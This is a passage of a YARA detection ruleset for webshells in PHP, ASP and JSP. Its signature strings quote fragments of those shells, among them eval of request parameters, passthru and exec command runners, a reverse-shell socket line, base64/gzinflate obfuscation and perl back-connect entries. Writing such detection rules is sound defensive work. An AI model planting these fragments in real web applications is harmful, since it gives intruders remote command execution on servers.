   		hash5 = "3ea688e3439a1f56b16694667938316d"   
   		hash6 = "2434a7a07cb47ce25b41d30bc291cacc"   
   	strings:   
   		$s0 = "\"\"+f.canRead()+\" / \"+f.canWrite()+\" / \"+f.canExecute()+\"</td>\"+" fullword   
   		$s4 = "out.println(\"<h2>File Manager - Current disk &quot;\"+(cr.indexOf(\"/\") == 0?"   
   		$s7 = "String execute = f.canExecute() ? \"checked=\\\"checked\\\"\" : \"\";" fullword   
   		$s8 = "\"<td nowrap>\"+f.canRead()+\" / \"+f.canWrite()+\" / \"+f.canExecute()+\"</td>"   
   	condition:   
   		2 of them   
rule WebShell_php_webshells_pws {   
   	meta:   
   		description = "PHP Webshells Github Archive - file pws.php"   
   		author = "Florian Roth"   
   		hash = "7a405f1c179a84ff8ac09a42177a2bcd8a1a481b"   
   	strings:   
   		$s6 = "if ($_POST['cmd']){" fullword   
   		$s7 = "$cmd = $_POST['cmd'];" fullword   
   		$s10 = "echo \"FILE UPLOADED TO $dez\";" fullword   
   		$s11 = "if (file_exists($uploaded)) {" fullword   
   		$s12 = "copy($uploaded, $dez);" fullword   
   		$s17 = "passthru($cmd);" fullword   
   	condition:   
   		4 of them   
rule Worse_Linux_Shell_php {   
   	meta:   
   		description = "Semi-Auto-generated  - file Worse Linux Shell.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "8338c8d9eab10bd38a7116eb534b5fa2"   
   	strings:   
   		$s1 = "print \"<tr><td><b>Server is:</b></td><td>\".$_SERVER['SERVER_SIGNATURE'].\"</td"   
   		$s2 = "print \"<tr><td><b>Execute command:</b></td><td><input size=100 name=\\\"_cmd"   
   	condition:   
   		1 of them   
rule KA_uShell {   
   	meta:   
   		description = "Webshells Auto-generated - file KA_uShell.php"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "685f5d4f7f6751eaefc2695071569aab"   
   	strings:   
   		$s5 = "if(empty($_SERVER['PHP_AUTH_PW']) || $_SERVER['PHP_AUTH_PW']<>$pass"   
   		$s6 = "if ($_POST['path']==\"\"){$uploadfile = $_FILES['file']['name'];}"   
   	condition:   
   		all of them   
rule WebShell_Gamma_Web_Shell {   
   	meta:   
   		description = "PHP Webshells Github Archive - file Gamma Web Shell.php"   
   		author = "Florian Roth"   
   		hash = "7ef773df7a2f221468cc8f7683e1ace6b1e8139a"   
   	strings:   
   		$s4 = "$ok_commands = ['ls', 'ls -l', 'pwd', 'uptime'];" fullword   
   		$s8 = "### Gamma Group <http://www.gammacenter.com>" fullword   
   		$s15 = "my $error = \"This command is not available in the restricted mode.\\n\";" fullword   
   		$s20 = "my $command = $self->query('command');" fullword   
   	condition:   
   		2 of them   
rule webshell_webshells_new_PHP1 {   
   	meta:   
   		description = "Web shells - generated from file PHP1.php"   
   		author = "Florian Roth"   
   		date = "2014/03/28"   
   		score = 70   
   		hash = "14c7281fdaf2ae004ca5fec8753ce3cb"   
   	strings:   
   		$s0 = "<[url=mailto:?@array_map($_GET[]?@array_map($_GET['f'],$_GET[/url]);?>" fullword   
   		$s2 = ":https://forum.90sec.org/forum.php?mod=viewthread&tid=7316" fullword   
   		$s3 = "@preg_replace(\"/f/e\",$_GET['u'],\"fengjiao\"); " fullword   
   	condition:   
   		1 of them   
rule WebShell_dC3_Security_Crew_Shell_PRiV_2 {   
   	meta:   
   		description = "PHP Webshells Github Archive - file dC3 Security Crew Shell PRiV.php"   
   		author = "Florian Roth"   
   		hash = "9077eb05f4ce19c31c93c2421430dd3068a37f17"   
   	strings:   
   		$s0 = "@rmdir($_GET['file']) or die (\"[-]Error deleting dir!\");" fullword   
   		$s9 = "header(\"Last-Modified: \".date(\"r\",filemtime(__FILE__)));" fullword   
   		$s13 = "header(\"Content-type: image/gif\");" fullword   
   		$s14 = "@copy($file,$to) or die (\"[-]Error copying file!\");" fullword   
   		$s20 = "if (isset($_GET['rename_all'])) {" fullword   
   	condition:   
   		3 of them   
rule WebShell_Sincap_1_0 {   
   	meta:   
   		description = "PHP Webshells Github Archive - file Sincap 1.0.php"   
   		author = "Florian Roth"   
   		hash = "9b72635ff1410fa40c4e15513ae3a496d54f971c"   
   	strings:   
   		$s4 = "</font></span><a href=\"mailto:shopen@aventgrup.net\">" fullword   
   		$s5 = "<title>:: AventGrup ::.. - Sincap 1.0 | Session(Oturum) B" fullword   
   		$s9 = "</span>Avrasya Veri ve NetWork Teknolojileri Geli" fullword   
   		$s12 = "while (($ekinci=readdir ($sedat))){" fullword   
   		$s19 = "$deger2= \"$ich[$tampon4]\";" fullword   
   	condition:   
   		2 of them   
rule webshell_jsp_sys3 {   
   	meta:   
   		description = "Web Shell - file sys3.jsp"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "b3028a854d07674f4d8a9cf2fb6137ec"   
   	strings:   
   		$s1 = "<input type=\"submit\" name=\"btnSubmit\" value=\"Upload\">" fullword   
   		$s4 = "String path=new String(request.getParameter(\"path\").getBytes(\"ISO-8859-1\""   
   		$s9 = "<%@page contentType=\"text/html;charset=gb2312\"%>" fullword   
   	condition:   
   		all of them   
rule multiple_webshells_0028 {   
   	meta:   
   		description = "Semi-Auto-generated  - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, dC3 Security Crew Shell PRiV.php.txt, SpecialShell_99.php.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		super_rule = 1   
   		was = "_w_php_php_c99madshell_v2_1_php_php_wacking_php_php_dC3_Security_Crew_Shell_PRiV_php_SpecialShell_99_php_php"   
   		hash0 = "38a3f9f2aa47c2e940695f3dba6a7bb2"   
   		hash1 = "3ca5886cd54d495dc95793579611f59a"   
   		hash2 = "9c5bb5e3a46ec28039e8986324e42792"   
   		hash3 = "433706fdc539238803fd47c4394b5109"   
   		hash4 = "09609851caa129e40b0d56e90dfc476c"   
   	strings:   
   		$s0 = " if ($mode & 0x200) {$world[\"execute\"] = ($world[\"execute\"] == \"x\")?\"t\":"   
   		$s1 = " $group[\"execute\"] = ($mode & 00010)?\"x\":\"-\";" fullword   
   	condition:   
   		all of them   
rule webshell_PHP_Shell_x3 {   
   	meta:   
   		description = "Web Shell - file PHP Shell.php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "a2f8fa4cce578fc9c06f8e674b9e63fd"   
   	strings:   
   		$s4 = "&nbsp;&nbsp;<?php echo buildUrl(\"<font color=\\\"navy\\\">["   
   		$s6 = "echo \"</form><form action=\\\"$SFileName?$urlAdd\\\" method=\\\"post\\\"><input"   
   		$s9 = "if  ( ( (isset($http_auth_user) ) && (isset($http_auth_pass)) ) && ( !isset("   
   	condition:   
   		2 of them   
rule webshell_jsp_reverse_jsp_reverse_jspbd {   
   	meta:   
   		description = "Web Shell - from files jsp-reverse.jsp, jsp-reverse.jsp, jspbd.jsp"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		super_rule = 1   
   		hash0 = "8b0e6779f25a17f0ffb3df14122ba594"   
   		hash1 = "ea87f0c1f0535610becadf5a98aca2fc"   
   		hash2 = "7d5e9732766cf5b8edca9b7ae2b6028f"   
   		score = 50   
   	strings:   
   		$s0 = "osw = new BufferedWriter(new OutputStreamWriter(os));" fullword   
   		$s7 = "sock = new Socket(ipAddress, (new Integer(ipPort)).intValue());" fullword   
   		$s9 = "isr = new BufferedReader(new InputStreamReader(is));" fullword   
   	condition:   
   		all of them   
rule webshell_Inderxer {   
   	meta:   
   		description = "Web Shell - file Inderxer.asp"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "9ea82afb8c7070817d4cdf686abe0300"   
   	strings:   
   		$s4 = "<td>Nereye :<td><input type=\"text\" name=\"nereye\" size=25></td><td><input typ"   
   	condition:   
   		all of them   
rule webshell_webshells_new_Asp {   
   	meta:   
   		description = "Web shells - generated from file Asp.asp"   
   		author = "Florian Roth"   
   		date = "2014/03/28"   
   		score = 70   
   		hash = "32c87744ea404d0ea0debd55915010b7"   
   	strings:   
   		$s1 = "Execute MorfiCoder(\")/*/z/*/(tseuqer lave\")" fullword   
   		$s2 = "Function MorfiCoder(Code)" fullword   
   		$s3 = "MorfiCoder=Replace(Replace(StrReverse(Code),\"/*/\",\"\"\"\"),\"\\*\\\",vbCrlf)" fullword   
   	condition:   
   		1 of them   
rule webshell_Crystal_Crystal {   
   	meta:   
   		description = "Web Shell - file Crystal.php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "fdbf54d5bf3264eb1c4bff1fac548879"   
   	strings:   
   		$s1 = "show opened ports</option></select><input type=\"hidden\" name=\"cmd_txt\" value"   
   		$s6 = "\" href=\"?act=tools\"><font color=#CC0000 size=\"3\">Tools</font></a></span></f"   
   	condition:   
   		all of them   
rule rst_sql_php_php {   
   	meta:   
   		description = "Semi-Auto-generated  - file rst_sql.php.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "0961641a4ab2b8cb4d2beca593a92010"   
   	strings:   
   		$s0 = "C:\\tmp\\dump_"   
   		$s1 = "RST MySQL"   
   		$s2 = "http://rst.void.ru"   
   		$s3 = "$st_form_bg='R0lGODlhCQAJAIAAAOfo6u7w8yH5BAAAAAAALAAAAAAJAAkAAAIPjAOnuJfNHJh0qtfw0lcVADs=';"   
   	condition:   
   		2 of them   
rule Webshell_acid_FaTaLisTiCz_Fx_fx_p0isoN_sh3ll_x0rg_byp4ss_256 {   
   	meta:   
   		description = "Detects Webshell - rule generated from from files acid.php, FaTaLisTiCz_Fx.txt, fx.txt, p0isoN.sh3ll.txt, x0rg.byp4ss.txt"   
   		author = "Florian Roth"   
   		reference = "https://github.com/nikicat/web-malware-collection"   
   		date = "2016-01-11"   
   		score = 70   
   		hash1 = "7a69466dbd18182ce7da5d9d1a9447228dcebd365e0fe855d0e02024f4117549"   
   		hash2 = "d0edca7539ef2d30f0b3189b21a779c95b5815c1637829b5594e2601e77cb4dc"   
   		hash3 = "65e7edf10ffb355bed81b7413c77d13d592f63d39e95948cdaea4ea0a376d791"   
   		hash4 = "ba87d26340f799e65c771ccb940081838afe318ecb20ee543f32d32db8533e7f"   
   		hash5 = "1fdf6e142135a34ae1caf1d84adf5e273b253ca46c409b2530ca06d65a55ecbd"   
   	strings:   
   		$s0 = "<form method=\"POST\"><input type=hidden name=act value=\"ls\">" fullword ascii   
   		$s2 = "foreach($quicklaunch2 as $item) {" fullword ascii   
   	condition:   
   		filesize < 882KB and all of them   
rule HYTop_CaseSwitch_2005 {   
   	meta:   
   		description = "Webshells Auto-generated - file 2005.exe"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "8bf667ee9e21366bc0bd3491cb614f41"   
   	strings:   
   		$s1 = "MSComDlg.CommonDialog"   
   		$s2 = "CommonDialog1"   
   		$s3 = "__vbaExceptHandler"   
   		$s4 = "EVENT_SINK_Release"   
   		$s5 = "EVENT_SINK_AddRef"   
   		$s6 = "By Marcos"   
   		$s7 = "EVENT_SINK_QueryInterface"   
   		$s8 = "MethCallEngine"   
   	condition:   
   		all of them   
rule uploader {   
   	meta:   
   		description = "Webshells Auto-generated - file uploader.php"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "b9a9aab319964351b46bd5fc9d6246a8"   
   	strings:   
   		$s0 = "move_uploaded_file($userfile, \"entrika.php\"); "   
   	condition:   
   		all of them   
rule webshell_jsp_cmd {   
   	meta:   
   		description = "Web Shell - file cmd.jsp"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "5391c4a8af1ede757ba9d28865e75853"   
   	strings:   
   		$s6 = "out.println(\"Command: \" + request.getParameter(\"cmd\") + \"<BR>\");" fullword   
   	condition:   
   		all of them   
rule webshell_browser_201_3_ma_ma2_download {   
   	meta:   
   		description = "Web Shell - from files browser.jsp, 201.jsp, 3.jsp, ma.jsp, ma2.jsp, download.jsp"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		super_rule = 1   
   		hash0 = "37603e44ee6dc1c359feb68a0d566f76"   
   		hash1 = "a7e25b8ac605753ed0c438db93f6c498"   
   		hash2 = "fb8c6c3a69b93e5e7193036fd31a958d"   
   		hash3 = "4cc68fa572e88b669bce606c7ace0ae9"   
   		hash4 = "4b45715fa3fa5473640e17f49ef5513d"   
   		hash5 = "fa87bbd7201021c1aefee6fcc5b8e25a"   
   	strings:   
   		$s1 = "private static final int EDITFIELD_ROWS = 30;" fullword   
   		$s2 = "private static String tempdir = \".\";" fullword   
   		$s6 = "<input type=\"hidden\" name=\"dir\" value=\"<%=request.getAttribute(\"dir\")%>\""   
   	condition:   
   		2 of them   
rule WebShell_php_webshells_lostDC {   
   	meta:   
   		description = "PHP Webshells Github Archive - file lostDC.php"   
   		author = "Florian Roth"   
   		hash = "d54fe07ea53a8929620c50e3a3f8fb69fdeb1cde"   
   	strings:   
   		$s0 = "$info .= '[~]Server: ' .$_SERVER['HTTP_HOST'] .'<br />';" fullword   
   		$s4 = "header ( \"Content-Description: Download manager\" );" fullword   
   		$s5 = "print \"<center>[ Generation time: \".round(getTime()-startTime,4).\" second"   
   		$s9 = "if (mkdir($_POST['dir'], 0777) == false) {" fullword   
   		$s12 = "$ret = shellexec($command);" fullword   
   	condition:   
   		2 of them   
rule asp_shell : webshell {   
   	meta:   
   		description = "Laudanum Injector Tools - file shell.asp"   
   		author = "Florian Roth"   
   		reference = "http://laudanum.inguardians.com/"   
   		date = "2015-06-22"   
   		hash = "8bf1ff6f8edd45e3102be5f8a1fe030752f45613"   
   	strings:   
   		$s1 = "<form action=\"shell.asp\" method=\"POST\" name=\"shell\">" fullword ascii /* PEStudio Blacklist: strings */   
   		$s2 = "%ComSpec% /c dir" fullword ascii /* PEStudio Blacklist: strings */   
   		$s3 = "Set objCmd = wShell.Exec(cmd)" fullword ascii /* PEStudio Blacklist: strings */   
   		$s4 = "Server.ScriptTimeout = 180" fullword ascii /* PEStudio Blacklist: strings */   
   		$s5 = "cmd = Request.Form(\"cmd\")" fullword ascii /* PEStudio Blacklist: strings */   
   		$s6 = "' ***  http://laudanum.secureideas.net" fullword ascii   
   		$s7 = "Dim wshell, intReturn, strPResult" fullword ascii /* PEStudio Blacklist: strings */   
   	condition:   
   		filesize < 15KB and 4 of them   
rule webshell_asp_01 {   
   	meta:   
   		description = "Web Shell - file 01.asp"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 50   
   		hash = "61a687b0bea0ef97224c7bd2df118b87"   
   	strings:   
   		$s0 = "<%eval request(\"pass\")%>" fullword   
   	condition:   
   		all of them   
rule eBayId_index3 {   
   	meta:   
   		description = "Webshells Auto-generated - file index3.php"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "0412b1e37f41ea0d002e4ed11608905f"   
   	strings:   
   		$s8 = "$err = \"<i>Your Name</i> Not Entered!</font></h2>Sorry, \\\"You"   
   	condition:   
   		all of them   
rule webshell_jspShell {   
   	meta:   
   		description = "Web Shell - file jspShell.jsp"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "0d5b5a17552254be6c1c8f1eb3a5fdc1"   
   	strings:   
   		$s0 = "<input type=\"checkbox\" name=\"autoUpdate\" value=\"AutoUpdate\" on"   
   		$s1 = "onblur=\"document.shell.autoUpdate.checked= this.oldValue;"   
   	condition:   
   		all of them   
rule webshell_JspSpy_JspSpyJDK5_JspSpyJDK51_luci_jsp_spy2009_m_ma3_xxx {   
   	meta:   
   		description = "Web Shell - from files 000.jsp, 403.jsp, 807.jsp, a.jsp, c5.jsp, css.jsp, dm.jsp, he1p.jsp, JspSpy.jsp, JspSpyJDK5.jsp, JspSpyJDK51.jsp, luci.jsp.spy2009.jsp, m.jsp, ma3.jsp, mmym520.jsp, nogfw.jsp, ok.jsp, queryDong.jsp, spyjsp2010.jsp, style.jsp, t00ls.jsp, u.jsp, xia.jsp, cofigrue.jsp, 1.jsp, jspspy.jsp, jspspy_k8.jsp, JspSpy.jsp, JspSpyJDK5.jsp"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		super_rule = 1   
   		hash0 = "2eeb8bf151221373ee3fd89d58ed4d38"   
   		hash1 = "059058a27a7b0059e2c2f007ad4675ef"   
   		hash2 = "ae76c77fb7a234380cd0ebb6fe1bcddf"   
   		hash3 = "76037ebd781ad0eac363d56fc81f4b4f"   
   		hash4 = "8b457934da3821ba58b06a113e0d53d9"   
   		hash5 = "fc44f6b4387a2cb50e1a63c66a8cb81c"   
   		hash6 = "14e9688c86b454ed48171a9d4f48ace8"   
   		hash7 = "b330a6c2d49124ef0729539761d6ef0b"   
   		hash8 = "d71716df5042880ef84427acee8b121e"   
   		hash9 = "341298482cf90febebb8616426080d1d"   
   		hash10 = "29aebe333d6332f0ebc2258def94d57e"   
   		hash11 = "42654af68e5d4ea217e6ece5389eb302"   
   		hash12 = "88fc87e7c58249a398efd5ceae636073"   
   		hash13 = "4a812678308475c64132a9b56254edbc"   
   		hash14 = "9626eef1a8b9b8d773a3b2af09306a10"   
   		hash15 = "344f9073576a066142b2023629539ebd"   
   		hash16 = "32dea47d9c13f9000c4c807561341bee"   
   		hash17 = "90a5ba0c94199269ba33a58bc6a4ad99"   
   		hash18 = "655722eaa6c646437c8ae93daac46ae0"   
   		hash19 = "b9744f6876919c46a29ea05b1d95b1c3"   
   		hash20 = "9c94637f76e68487fa33f7b0030dd932"   
   		hash21 = "6acc82544be056580c3a1caaa4999956"   
   		hash22 = "6aa32a6392840e161a018f3907a86968"   
   		hash23 = "349ec229e3f8eda0f9eb918c74a8bf4c"   
   		hash24 = "3ea688e3439a1f56b16694667938316d"   
   		hash25 = "ab77e4d1006259d7cbc15884416ca88c"   
   		hash26 = "71097537a91fac6b01f46f66ee2d7749"   
   		hash27 = "2434a7a07cb47ce25b41d30bc291cacc"   
   		hash28 = "7a4b090619ecce6f7bd838fe5c58554b"   
   	strings:   
   		$s8 = "\"<form action=\\\"\"+SHELL_NAME+\"?o=upload\\\" method=\\\"POST\\\" enctype="   
   		$s9 = "<option value='reg query \\\"HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\T"   
   	condition:   
   		all of them   
rule phpjackal_php {   
   	meta:   
   		description = "Semi-Auto-generated  - file phpjackal.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "ab230817bcc99acb9bdc0ec6d264d76f"   
   	strings:   
   		$s3 = "$dl=$_REQUEST['downloaD'];"   
   		$s4 = "else shelL(\"perl.exe $name $port\");"   
   	condition:   
   		1 of them   
rule webshell_shell_phpspy_2005_full_phpspy_2005_lite_phpspy_2006_arabicspy_PHPSPY_hkrkoz {   
   	meta:   
   		description = "Web Shell - from files shell.php, phpspy_2005_full.php, phpspy_2005_lite.php, phpspy_2006.php, arabicspy.php, PHPSPY.php, hkrkoz.php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		super_rule = 1   
   		hash0 = "791708057d8b429d91357d38edf43cc0"   
   		hash1 = "b68bfafc6059fd26732fa07fb6f7f640"   
   		hash2 = "42f211cec8032eb0881e87ebdb3d7224"   
   		hash3 = "40a1f840111996ff7200d18968e42cfe"   
   		hash4 = "e0202adff532b28ef1ba206cf95962f2"   
   		hash5 = "0712e3dc262b4e1f98ed25760b206836"   
   		hash6 = "802f5cae46d394b297482fd0c27cb2fc"   
   	strings:   
   		$s0 = "$mainpath_info           = explode('/', $mainpath);" fullword   
   		$s6 = "if (!isset($_GET['action']) OR empty($_GET['action']) OR ($_GET['action'] == \"d"   
   	condition:   
   		all of them   
rule WebShell_Moroccan_Spamers_Ma_EditioN_By_GhOsT {   
   	meta:   
   		description = "PHP Webshells Github Archive - file Moroccan Spamers Ma-EditioN By GhOsT.php"   
   		author = "Florian Roth"   
   		hash = "31e5473920a2cc445d246bc5820037d8fe383201"   
   	strings:   
   		$s4 = "$content = chunk_split(base64_encode($content)); " fullword   
   		$s12 = "print \"Sending mail to $to....... \"; " fullword   
   		$s16 = "if (!$from && !$subject && !$message && !$emaillist){ " fullword   
   	condition:   
   		all of them   
rule WebShell_Safe_Mode_Bypass_PHP_4_4_2_and_PHP_5_1_2_2 {   
   	meta:   
   		description = "PHP Webshells Github Archive - file Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php"   
   		author = "Florian Roth"   
   		hash = "8fdd4e0e87c044177e9e1c97084eb5b18e2f1c25"   
   	strings:   
   		$s1 = "<option value=\"/etc/passwd\">Get /etc/passwd</option>" fullword   
   		$s3 = "xb5@hotmail.com</FONT></CENTER></B>\");" fullword   
   		$s4 = "$v = @ini_get(\"open_basedir\");" fullword   
   		$s6 = "by PHP Emperor<xb5@hotmail.com>" fullword   
   	condition:   
   		2 of them   
rule WebShell_Generic_PHP_8 {   
   	meta:   
   		description = "PHP Webshells Github Archive - from files Macker's Private PHPShell.php, PHP Shell.php, Safe0ver Shell -Safe Mod Bypass By Evilc0der.php"   
   		author = "Florian Roth"   
   		super_rule = 1   
   		hash0 = "fc1ae242b926d70e32cdb08bbe92628bc5bd7f99"   
   		hash1 = "9ad55629c4576e5a31dd845012d13a08f1c1f14e"   
   		hash2 = "c4aa2cf665c784553740c3702c3bfcb5d7af65a3"   
   	strings:   
   		$s1 = "elseif ( $cmd==\"file\" ) { /* <!-- View a file in text --> */" fullword   
   		$s2 = "elseif ( $cmd==\"upload\" ) { /* <!-- Upload File form --> */ " fullword   
   		$s3 = "/* I added this to ensure the script will run correctly..." fullword   
   		$s14 = "<!--    </form>   -->" fullword   
   		$s15 = "<form action=\\\"$SFileName?$urlAdd\\\" method=\\\"POST\\\">" fullword   
   		$s20 = "elseif ( $cmd==\"downl\" ) { /*<!-- Save the edited file back to a file --> */" fullword   
   	condition:   
   		3 of them   
rule Webshell_acid_AntiSecShell_3 {   
   	meta:   
   		description = "Detects Webshell Acid"   
   		author = "Florian Roth"   
   		reference = "https://github.com/nikicat/web-malware-collection"   
   		date = "2016-01-11"   
   		score = 70   
   		hash1 = "2b8aed49f50acd0c1b89a399647e1218f2a8545da96631ac0882da28810eecc4"   
   		hash2 = "7a69466dbd18182ce7da5d9d1a9447228dcebd365e0fe855d0e02024f4117549"   
   		hash3 = "0202f72b3e8b62e5ebc99164c7d4eb8ec5be6a7527286e9059184aa8321e0092"   
   		hash4 = "d4424c61fe29d2ee3d8503f7d65feb48341ac2fc0049119f83074950e41194d5"   
   		hash5 = "5d7709a33879d1060a6cff5bae119de7d5a3c17f65415822fd125af56696778c"   
   		hash6 = "21dd06ec423f0b49732e4289222864dcc055967922d0fcec901d38a57ed77f06"   
   		hash7 = "c377f9316a4c953602879eb8af1fd7cbb0dd35de6bb4747fa911234082c45596"   
   		hash8 = "816e699014be9a6d02d5d184eb958c49469d687b7c6fb88e878bca64688a19c9"   
   		hash9 = "383d771b55bbe5343bab946fd7650fd42de1933c4c8f32449d9a40c898444ef1"   
   		hash10 = "07f9ec716fb199e00a90091ffba4c2ee1a328a093a64e610e51ab9dd6d33357a"   
   		hash11 = "615e768522447558970c725909e064558f33d38e6402c63c92a1a8bc62b64966"   
   		hash12 = "bbe0f7278041cb3a6338844aa12c3df6b700a12a78b0a58bce3dce14f1c37b96"   
   		hash13 = "d0edca7539ef2d30f0b3189b21a779c95b5815c1637829b5594e2601e77cb4dc"   
   		hash14 = "65e7edf10ffb355bed81b7413c77d13d592f63d39e95948cdaea4ea0a376d791"   
   		hash15 = "ef3a7cd233a880fc61efc3884f127dd8944808babd1203be2400144119b6057f"   
   		hash16 = "ba87d26340f799e65c771ccb940081838afe318ecb20ee543f32d32db8533e7f"   
   		hash17 = "a4db77895228f02ea17ff48976e03100ddfaef7c9f48c1d40462872f103451d5"   
   		hash18 = "1fdf6e142135a34ae1caf1d84adf5e273b253ca46c409b2530ca06d65a55ecbd"   
   	strings:   
   		$s0 = "echo \"<option value=delete\".($dspact == \"delete\"?\" selected\":\"\").\">Delete</option>\";" fullword ascii   
   		$s1 = "if (!is_readable($o)) {return \"<font color=red>\".view_perms(fileperms($o)).\"</font>\";}" fullword ascii   
   	condition:   
   		filesize < 900KB and all of them   
rule webshell_webshells_new_make2 {   
   	meta:   
   		description = "Web shells - generated from file make2.php"   
   		author = "Florian Roth"   
   		date = "2014/03/28"   
   		hash = "9af195491101e0816a263c106e4c145e"   
   		score = 50   
   	strings:   
   		$s1 = "error_reporting(0);session_start();header(\"Content-type:text/html;charset=utf-8"   
   	condition:   
   		all of them   
rule webshell_jsp_jshell {   
   	meta:   
   		description = "Web Shell - file jshell.jsp"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "124b22f38aaaf064cef14711b2602c06"   
   	strings:   
   		$s0 = "kXpeW[\"" fullword   
   		$s4 = "[7b:g0W@W<" fullword   
   		$s5 = "b:gHr,g<" fullword   
   		$s8 = "RhV0W@W<" fullword   
   		$s9 = "S_MR(u7b" fullword   
   	condition:   
   		all of them   
rule down_rar_Folder_down {   
   	meta:   
   		description = "Webshells Auto-generated - file down.asp"   
   		author = "Yara Bulk Rule Generator by Florian Roth"   
   		hash = "db47d7a12b3584a2e340567178886e71"   
   	strings:   
   		$s0 = "response.write \"<font color=blue size=2>NetBios Name: \\\\\"  & Snet.ComputerName &"   
   	condition:   
   		all of them   
rule Casus15_php_php {   
   	meta:   
   		description = "Semi-Auto-generated  - file Casus15.php.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "5e2ede2d1c4fa1fcc3cbfe0c005d7b13"   
   	strings:   
   		$s0 = "copy ( $dosya_gonder2, \"$dir/$dosya_gonder2_name\") ? print(\"$dosya_gonder2_na"   
   		$s2 = "echo \"<center><font size='$sayi' color='#FFFFFF'>HACKLERIN<font color='#008000'"   
   		$s3 = "value='Calistirmak istediginiz "   
   	condition:   
   		1 of them   
rule Weevely_Webshell : webshell {   
   	meta:   
   		description = "Weevely Webshell - Generic Rule - heavily scrambled tiny web shell"   
   		author = "Florian Roth"   
   		reference = "http://www.ehacking.net/2014/12/weevely-php-stealth-web-backdoor-kali.html"   
   		date = "2014/12/14"   
   		score = 60   
   	strings:   
   		$php = "<?php" ascii   
   		$s0 = /\$[a-z]{4} = \$[a-z]{4}\("[a-z][a-z]?",[\s]?"",[\s]?"/ ascii   
   		$s1 = /\$[a-z]{4} = str_replace\("[a-z][a-z]?","","/ ascii   
   		$s2 = /\$[a-z]{4}\.\$[a-z]{4}\.\$[a-z]{4}\.\$[a-z]{4}\)\)\); \$[a-z]{4}\(\);/ ascii   
   		$s4 = /\$[a-z]{4}="[a-zA-Z0-9]{70}/ ascii   
   	condition:   
   		$php at 0 and all of ($s*) and filesize > 570 and filesize < 800   
rule webshell_c99_c66_c99_shadows_mod_c99shell {   
   	meta:   
   		description = "Web Shell - from files c99.php, c66.php, c99-shadows-mod.php, c99shell.php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		super_rule = 1   
   		hash0 = "61a92ce63369e2fa4919ef0ff7c51167"   
   		hash1 = "0f5b9238d281bc6ac13406bb24ac2a5b"   
   		hash2 = "68c0629d08b1664f5bcce7d7f5f71d22"   
   		hash3 = "048ccc01b873b40d57ce25a4c56ea717"   
   	strings:   
   		$s2 = "  if (unlink(_FILE_)) {@ob_clean(); echo \"Thanks for using c99shell v.\".$shv"   
   		$s3 = "  \"c99sh_backconn.pl\"=>array(\"Using PERL\",\"perl %path %host %port\")," fullword   
   		$s4 = "<br><TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#66"   
   		$s7 = "   elseif (!$data = c99getsource($bind[\"src\"])) {echo \"Can't download sources"   
   		$s8 = "  \"c99sh_datapipe.pl\"=>array(\"Using PERL\",\"perl %path %localport %remotehos"   
   		$s9 = "   elseif (!$data = c99getsource($bc[\"src\"])) {echo \"Can't download sources!"   
   	condition:   
   		2 of them   
rule webshell_wsb_idc {   
   	meta:   
   		description = "Web Shell - file idc.php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "7c5b1b30196c51f1accbffb80296395f"   
   	strings:   
   		$s1 = "if (md5($_GET['usr'])==$user && md5($_GET['pass'])==$pass)" fullword   
   		$s3 = "{eval($_GET['idc']);}" fullword   
   	condition:   
   		1 of them   
rule cmdjsp_jsp {   
   	meta:   
   		description = "Semi-Auto-generated  - file cmdjsp.jsp.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		hash = "b815611cc39f17f05a73444d699341d4"   
   	strings:   
   		$s0 = "// note that linux = cmd and windows = \"cmd.exe /c + cmd\" " fullword   
   		$s1 = "Process p = Runtime.getRuntime().exec(\"cmd.exe /C \" + cmd);" fullword   
   		$s2 = "cmdjsp.jsp"   
   		$s3 = "michaeldaw.org" fullword   
   	condition:   
   		2 of them   
rule webshell_PHP_150 {   
   	meta:   
   		description = "Web Shell - file 150.php"   
   		author = "Florian Roth"   
   		date = "2014/01/28"   
   		score = 70   
   		hash = "400c4b0bed5c90f048398e1d268ce4dc"   
   	strings:   
   		$s0 = "HJ3HjqxclkZfp"   
   		$s1 = "<? eval(gzinflate(base64_decode('" fullword   
   	condition:   
   		all of them   
rule multiple_webshells_0031 {   
   	meta:   
   		description = "Semi-Auto-generated  - from files r577.php.php.txt, r57.php.php.txt, spy.php.php.txt, s.php.php.txt"   
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"   
   		super_rule = 1   
   		was = "_r577_php_php_r57_php_php_spy_php_php_s_php_php"   
